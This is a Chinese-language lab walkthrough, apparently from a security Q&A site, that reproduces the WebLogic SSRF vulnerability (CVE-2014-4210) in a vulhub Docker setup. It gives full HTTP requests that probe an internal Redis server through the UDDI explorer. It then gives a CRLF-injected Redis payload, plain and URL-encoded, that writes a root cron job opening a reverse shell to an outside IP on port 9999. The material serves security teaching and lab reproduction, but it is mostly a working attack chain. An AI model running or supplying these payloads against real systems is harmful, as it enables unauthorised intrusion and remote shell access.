这个实验先通过SSRF探测存在redis未授权,然后通过redis未授权写定时任务,完成反弹shell。Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。[1]
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选简单访问一下,说明WebLogic SSRF漏洞(CVE-2014-4210)环境搭建成功了
掏出burpsuite,构造请求 http://127.0.0.1:7001 ,访问成功了
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1Host: 144.34.162.13:7001Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Connection: close对于非HTTP请求,收到 which did not have a valid SOAP content-type: null. 表示成功
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.16.2:6379 HTTP/1.1Host: 144.34.162.13:7001Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=-zmAMUwD9WiZnCNSsSFr8ERVm7b; JSESSIONID=2n18lr7Tdn9bHWkvGb0216hvk3lP15G2KZJJWFsh06tN3SfySJ7p!-2007096827Connection: close通过redis定时任务进行反弹shell
testset 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/174.137.58.6/9999 0>&1'\n\n\n\n"config set dir /etc/config set dbfilename crontabsaveailx10url编码,注意所有换行都是\r\n
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F174.137.58.6%2F9999%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aailx10反弹shell成功
参考^Weblogic SSRF漏洞 https://github.com/Threekiii/Vulhub-Reproduce/blob/master/Weblogic%20SSRF%E6%BC%8F%E6%B4%9E.md